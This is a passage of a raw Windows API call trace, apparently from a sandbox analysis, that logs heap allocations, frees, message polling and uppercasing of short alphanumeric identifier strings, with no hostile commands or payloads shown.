(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.503] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0253.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.504] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.505] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.505] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0253.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.505] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.506] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.506] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.506] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.507] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0253.507] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.507] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.508] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.508] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0253.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.509] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.510] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.510] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0253.510] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.510] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.511] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.511] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.512] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.512] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.513] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.513] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0253.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d960 [0253.513] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0253.525] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.526] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.526] RtlAllocateHeap 